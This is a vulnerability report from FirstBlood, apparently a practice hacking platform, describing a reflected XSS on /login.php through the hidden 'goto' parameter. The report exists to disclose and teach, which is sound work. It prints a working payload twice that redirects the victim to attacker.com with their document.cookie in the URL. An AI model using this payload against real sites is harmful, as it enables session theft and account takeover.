FirstBlood-#791 — Reflective XSS on Login page using the hidden "goto" parameter
This issue was discovered on FirstBlood v2
On 2021-10-28, xnl-h4ck3r Level 4 reported:
Summary
A reflected XSS vulnerability exists on /login.php
using the hidden goto
parameter.
Description
There is a reflected XSS on the /login.php
endpoint using the hidden goto
parameter, which leads to account takeover.
Steps to reproduce
- The
goto
paramater was a hidden parameter found in Version 1. When used on the login.php
endpoint it is reflected in the HTML source code:

- Go to
/login.php
and log in as an existing user.
- Go to the following endpoint and observe that the XSS payload redirects the user to an attackers site and leaks the cookies in the URL:
/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://attacker.com/?${document.cookie}`%22%3E

Impact
An attacker can craft a malicious link to send to a user. If the user is already aythenitcated, the link can send the users cookies to the attacker via an open redirect and then take over the users account.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://attacker.com/?${document.cookie}`%22%3E
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (
ID 39
), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.